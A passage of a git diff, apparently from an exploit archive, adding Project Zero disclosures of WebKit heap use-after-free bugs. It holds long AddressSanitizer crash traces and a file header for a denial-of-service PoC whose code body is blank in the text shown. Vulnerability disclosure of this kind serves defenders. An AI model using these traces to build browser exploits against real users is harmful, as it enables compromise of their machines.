(/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87715) + #50 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #51 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #52 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #53 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #54 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #55 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #56 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #57 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #58 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #59 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #60 0x1043e956c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #61 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x61e00005d0d8 is located 88 bytes inside of 2920-byte region [0x61e00005d080,0x61e00005dbe8) +freed by thread T0 here: + #0 0x107656294 in __sanitizer_mz_free 
(/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) + #1 0x11921b650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650) + #2 0x1188b9845 in void JSC::MarkedBlock::Handle::specializedSweep(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(void*)::operator()(void*) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1410845) + #3 0x1188b98fa in void JSC::MarkedBlock::Handle::specializedSweep(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x14108fa) + #4 0x1188b5fcd in void JSC::MarkedBlock::Handle::specializedSweep(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x140cfcd) + #5 0x1188afced in void 
JSC::MarkedBlock::Handle::finishSweepKnowingSubspace(JSC::FreeList*, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1406ced) + #6 0x1188af34e in void JSC::MarkedBlock::Handle::finishSweepKnowingSubspace(JSC::FreeList*, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x140634e) + #7 0x1188aefa2 in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::FreeList*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1405fa2) + #8 0x118b641ab in JSC::MarkedBlock::Handle::sweep(JSC::FreeList*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16bb1ab) + #9 0x118b5f2e2 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16b62e2) + #10 0x118b5ec1a in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16b5c1a) + #11 0x118b5fce6 in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16b6ce6) + #12 0x118f305f2 in JSC::Subspace::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1a875f2) + #13 0x10b9f5219 in void* JSC::allocateCell(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13b0219) + #14 0x10b9f4e89 in 
WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13afe89) + #15 0x10b9f4dcb in std::__1::enable_if::value, WebCore::JSDOMWrapperConverterTraits::WrapperClass*>::type WebCore::createWrapper(WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13afdcb) + #16 0x10b9f4b99 in std::__1::enable_if::value), WebCore::JSDOMWrapperConverterTraits::WrapperClass*>::type WebCore::createWrapper(WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13afb99) + #17 0x10b9f482d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13af82d) + #18 0x10b9f49f8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13af9f8) + #19 0x10c0407ce in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19fb7ce) + #20 0x10b41b57b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdd657b) + #21 0x10bc3fe80 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x15fae80) + #22 0x10d061fa3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a1cfa3) + #23 0x10479c7a6 in 
WebCore::ScriptController::windowProxy(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3957a6) + #24 0x104799e28 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x392e28) + #25 0x104b78fc4 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x771fc4) + #26 0x7fffe652f9e1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55e9e1) + #27 0x7fffe6089a67 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8a67) + #28 0x7fffe60970b1 in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc60b1) + #29 0x7fffe617121c in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x1a021c) + +previously allocated by thread T0 here: + #0 0x107655d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x11921bad4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x119219d6d 
in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x1191a0247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x11919f63a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x10a78b648 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x146648) + #7 0x10ae0549d in WebCore::HTMLDocument::create(WebCore::Frame*, WebCore::URL const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7c049d) + #8 0x10aea7ce9 in WebCore::DOMImplementation::createHTMLDocument(WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x862ce9) + #9 0x10ba41880 in WebCore::jsDOMImplementationPrototypeFunctionCreateHTMLDocumentBody(JSC::ExecState*, WebCore::JSDOMImplementation*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13fc880) + #10 0x10ba3e938 in long long WebCore::IDLOperation::call<&(WebCore::jsDOMImplementationPrototypeFunctionCreateHTMLDocumentBody(JSC::ExecState*, WebCore::JSDOMImplementation*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13f9938) + #11 0x5c8fdbe01027 () + #12 0x118b53e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #13 0x118b4cf6f in vmEntryToJavaScript 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #14 0x1187b0847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #15 0x11873188a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #16 0x117d4a731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #17 0x117d4a9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #18 0x117d4ad13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #19 0x10b883615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #20 0x10bc966cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #21 0x10b002010 in 
WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #22 0x10b001ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #23 0x10afc9b97 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x984b97) + #24 0x10afcabde in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985bde) + #25 0x10afca553 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985553) + #26 0x10afca1de in WebCore::EventDispatcher::dispatchScopedEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9851de) + #27 0x10aa19a86 in WebCore::dispatchChildRemovalEvents(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3d4a86) + #28 0x10aa14152 in WebCore::willRemoveChildren(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cf152) + #29 0x10aa13cb0 in WebCore::ContainerNode::replaceAllChildren(WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cecb0) + +SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5a4a) in WebCore::TreeScope::documentScope() const +Shadow bytes around the buggy address: + 
0x1c3c0000b9c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c3c0000b9d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x1c3c0000b9e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x1c3c0000b9f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x1c3c0000ba00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x1c3c0000ba10: fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd + 0x1c3c0000ba20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x1c3c0000ba30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x1c3c0000ba40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x1c3c0000ba50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x1c3c0000ba60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==29647==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43167.js b/platforms/multiple/dos/43167.js new file mode 100644 index 000000000..a4b77cd81 --- /dev/null +++ b/platforms/multiple/dos/43167.js @@ -0,0 +1,210 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1345 + +There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +PoC: + +================================================================= +*/ + + + +
+
+ + +/* +================================================================= + +ASan log: + +================================================================= +==29682==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800005dca8 at pc 0x00011110054b bp 0x7fff58adafe0 sp 0x7fff58adafd8 +READ of size 8 at 0x60800005dca8 thread T0 +==29682==WARNING: invalid path to external symbolizer! +==29682==WARNING: Failed to use and restart external symbolizer! + #0 0x11110054a in WebCore::InputType::element() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20654a) + #1 0x113e51440 in WebCore::TextFieldInputType::forwardEvent(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f57440) + #2 0x111c8c71f in WebCore::HTMLInputElement::defaultEventHandler(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9271f) + #3 0x11187fd55 in WebCore::callDefaultEventHandlersInTheBubblingOrder(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985d55) + #4 0x11187f65e in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98565e) + #5 0x11184fe15 in WebCore::Element::dispatchFocusEvent(WTF::RefPtr&&, WebCore::FocusDirection) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x955e15) + #6 0x1116a011d in WebCore::Document::setFocusedElement(WebCore::Element*, WebCore::FocusDirection, WebCore::Document::FocusRemovalEventsMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7a611d) + #7 0x11196a1d7 in WebCore::FocusController::setFocusedElement(WebCore::Element*, WebCore::Frame&, 
WebCore::FocusDirection) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xa701d7) + #8 0x111a638c1 in WebCore::FrameSelection::setFocusedElementIfNeeded() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb698c1) + #9 0x111a631f6 in WebCore::FrameSelection::setSelectionWithoutUpdatingAppearance(WebCore::VisibleSelection const&, unsigned int, WebCore::FrameSelection::CursorAlignOnScroll, WebCore::TextGranularity) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb691f6) + #10 0x111a60f94 in WebCore::FrameSelection::setSelection(WebCore::VisibleSelection const&, unsigned int, WebCore::AXTextStateChangeIntent, WebCore::FrameSelection::CursorAlignOnScroll, WebCore::TextGranularity) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb66f94) + #11 0x111a61b9f in WebCore::FrameSelection::moveWithoutValidationTo(WebCore::Position const&, WebCore::Position const&, bool, bool, WebCore::AXTextStateChangeIntent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb67b9f) + #12 0x111d44152 in WebCore::HTMLTextFormControlElement::setSelectionRange(int, int, WebCore::TextFieldSelectionDirection, WebCore::AXTextStateChangeIntent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe4a152) + #13 0x111d43d86 in WebCore::HTMLTextFormControlElement::setSelectionDirection(WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe49d86) + #14 0x111c8ff81 in WebCore::HTMLInputElement::setSelectionDirectionForBindings(WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd95f81) + #15 0x1126f30fe in 
WebCore::setJSHTMLInputElementSelectionDirectionSetter(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x17f90fe) + #16 0x1126ea167 in bool WebCore::IDLAttribute::set<&(WebCore::setJSHTMLInputElementSelectionDirectionSetter(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x17f0167) + #17 0x11cd05e48 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9aee48) + #18 0x11cd05f77 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9aef77) + #19 0x11d80a008 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x14b3008) + #20 0x11d9e0655 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1689655) + #21 0x11d9fe4f4 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a74f4) + #22 0x11da01e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #23 0x11d9faf6f in vmEntryToJavaScript 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #24 0x11d65e847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #25 0x11d5df88a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #26 0x11cbf8731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #27 0x11cbf89a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #28 0x11cbf8d13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #29 0x112138615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #30 0x11254b6cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #31 0x1118b7010 in 
WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #32 0x1118b6ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #33 0x111794051 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89a051) + #34 0x1117a3c0f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8a9c0f) + #35 0x111696b0f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79cb0f) + #36 0x111690bad in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x796bad) + #37 0x111a433ed in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb493ed) + #38 0x111a4075c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4675c) + #39 0x1116b0523 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b6523) + #40 0x111c345d0 in WebCore::HTMLDocumentParser::prepareToStopParsing() 